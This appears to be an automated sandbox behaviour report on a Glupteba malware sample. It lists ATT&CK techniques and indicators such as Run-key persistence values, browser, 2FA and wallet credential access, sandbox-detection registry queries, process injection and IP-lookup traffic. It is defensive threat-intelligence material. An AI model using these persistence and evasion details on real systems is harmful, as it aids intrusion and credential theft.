glupteba | 64dc2b5958fe37dd9733928c156e0c75ab544e2e0169f9f796c3f3db809bcbe5

System Information Discovery

Processes:

Nasaesypymu.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Nasaesypymu.exe

Deletes itself 1 IoCs

Processes:

pid process

3016

pid	process
3016

Loads dropped DLL 28 IoCs

Processes:

toolspab2 (16).exeA1CA.exeE23.tmpI-Record.exe4587.exeregsvr32.exerundll32.exefa041e8b.exetoolspab1.exebuild2.exeseuthjrreuthjrcauthjrreuthjrseuthjrcauthjrreuthjrseuthjrcauthjr

pid	process
208	toolspab2 (16).exe
816	A1CA.exe
1248	E23.tmp
4904	I-Record.exe
4904	I-Record.exe
4904	I-Record.exe
4904	I-Record.exe
4904	I-Record.exe
4904	I-Record.exe
4904	I-Record.exe
4904	I-Record.exe
4580	4587.exe
4580	4587.exe
4772	regsvr32.exe
5784	rundll32.exe
4264	fa041e8b.exe
7012	toolspab1.exe
3156	build2.exe
3156	build2.exe
6784	seuthjr
6984	reuthjr
2236	cauthjr
6972	reuthjr
5684	seuthjr
6176	cauthjr
6140	reuthjr
5928	seuthjr
5204	cauthjr

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

3560 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3560	icacls.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

1075474_ah_hot_iconçè_)))_.exe7440878.exe16F.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\Syfenishega.exe\""	1075474_ah_hot_iconçè_)))_.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	7440878.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\d76e6945-3406-4fe4-81a8-c0899f2db375\\16F.exe\" --AutoStart"	16F.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

B24.exemd6_6ydj.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	B24.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md6_6ydj.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
118	api.2ip.ua
224	api.2ip.ua
225	api.2ip.ua
875	api.2ip.ua
1311	api.2ip.ua
117	api.2ip.ua
204	ip-api.com
393	api.2ip.ua
394	api.2ip.ua
833	api.2ip.ua
999	api.2ip.ua
1122	api.2ip.ua

Drops file in System32 directory 6 IoCs

Processes:

svchost.exesvchost.exesvchost.exepowershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent B941027BD05B76D7	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

regsvr32.exe

pid process

4772 regsvr32.exe

pid	process
4772	regsvr32.exe

Suspicious use of SetThreadContext 18 IoCs

Processes:

toolspab2 (16).exe937D.exe16F.exezgqwyuzy.exe16F.exesvchost.exetoolspab1.exebuild2.exe16F.execauthjrsvchost.exe16F.exe16F.execauthjr16F.exe16F.execauthjr16F.exe

description	pid	process	target process
PID 3948 set thread context of 208	3948	toolspab2 (16).exe	toolspab2 (16).exe
PID 1500 set thread context of 1556	1500	937D.exe	937D.exe
PID 4084 set thread context of 4004	4084	16F.exe	16F.exe
PID 4272 set thread context of 5100	4272	zgqwyuzy.exe	svchost.exe
PID 4144 set thread context of 5480	4144	16F.exe	16F.exe
PID 720 set thread context of 5140	720	svchost.exe	svchost.exe
PID 6512 set thread context of 7012	6512	toolspab1.exe	toolspab1.exe
PID 5916 set thread context of 3156	5916	build2.exe	build2.exe
PID 5072 set thread context of 6496	5072	16F.exe	16F.exe
PID 5388 set thread context of 2236	5388	cauthjr	cauthjr
PID 5100 set thread context of 1684	5100	svchost.exe	svchost.exe
PID 6060 set thread context of 5924	6060	16F.exe	16F.exe
PID 416 set thread context of 6596	416	16F.exe	16F.exe
PID 4532 set thread context of 6176	4532	cauthjr	cauthjr
PID 6384 set thread context of 640	6384	16F.exe	16F.exe
PID 6364 set thread context of 3636	6364	16F.exe	16F.exe
PID 4584 set thread context of 5204	4584	cauthjr	cauthjr
PID 4884 set thread context of 1048	4884	16F.exe	16F.exe

Drops file in Program Files directory 30 IoCs

Processes:

irecord.tmp1075474_ah_hot_iconçè_)))_.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\i-record\AForge.Video.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-ED0K8.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-Q8BMM.tmp	irecord.tmp
File created	C:\Program Files (x86)\Windows Multimedia Platform\Syfenishega.exe	1075474_ah_hot_iconçè_)))_.exe
File created	C:\Program Files (x86)\i-record\unins000.dat	irecord.tmp
File created	C:\Program Files (x86)\Windows Multimedia Platform\Syfenishega.exe.config	1075474_ah_hot_iconçè_)))_.exe
File created	C:\Program Files (x86)\i-record\is-MSGLU.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\unins000.dat	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avdevice-53.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avfilter-2.dll	irecord.tmp
File created	C:\Program Files\Windows Multimedia Platform\TLJRVISOCO\irecord.exe	1075474_ah_hot_iconçè_)))_.exe
File created	C:\Program Files (x86)\i-record\is-V901O.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-QQ3OT.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avutil-51.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\postproc-52.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-MPSLC.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-A9PK7.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-QLTMI.tmp	irecord.tmp
File created	C:\Program Files\Windows Multimedia Platform\TLJRVISOCO\irecord.exe.config	1075474_ah_hot_iconçè_)))_.exe
File opened for modification	C:\Program Files (x86)\i-record\avformat-53.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\swscale-2.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avcodec-53.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\swresample-0.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-1U9HV.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-JNBHV.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-LPPPQ.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-6O7DI.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-9LINM.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\I-Record.exe	irecord.tmp

Drops file in Windows directory 3 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5624	5320	WerFault.exe	MicrosoftEdgeCP.exe
4620	212	WerFault.exe	1CF.exe
5824	1128	WerFault.exe	5643095.exe
6868	4292	WerFault.exe	MicrosoftEdgeCP.exe

Checks SCSI registry key(s) 3 TTPs 39 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

toolspab2 (16).exereuthjrreuthjrseuthjrfa041e8b.execauthjrcauthjrcauthjrreuthjrA1CA.exeseuthjrseuthjrtoolspab1.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2 (16).exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reuthjr
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reuthjr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seuthjr
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seuthjr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fa041e8b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reuthjr
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cauthjr
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2 (16).exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fa041e8b.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cauthjr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cauthjr
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reuthjr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A1CA.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seuthjr
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seuthjr
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reuthjr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seuthjr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reuthjr
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fa041e8b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seuthjr
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cauthjr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seuthjr
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seuthjr
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cauthjr
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A1CA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cauthjr
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cauthjr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cauthjr
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reuthjr
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reuthjr
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seuthjr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2 (16).exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	A1CA.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reuthjr
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cauthjr

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

4587.exesvchost.exeWerFault.exebuild2.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	4587.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	4587.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

5900 timeout.exe
4572 timeout.exe

pid	process
5900	timeout.exe
4572	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

WerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4744 taskkill.exe
3308 taskkill.exe
5192 taskkill.exe
5188 taskkill.exe
4984 taskkill.exe

pid	process
4744	taskkill.exe
3308	taskkill.exe
5192	taskkill.exe
5188	taskkill.exe
4984	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

Processes:

browser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exebrowser_broker.exeMicrosoftEdge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

app.exe1C3D.exeapp.exepowershell.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2451 = "Saint Pierre Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	1C3D.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2791 = "Novosibirsk Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	1C3D.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32,@elscore.dll,-2 = "Microsoft Script Detection"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	1C3D.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	1C3D.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	1C3D.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	1C3D.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	1C3D.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	1C3D.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
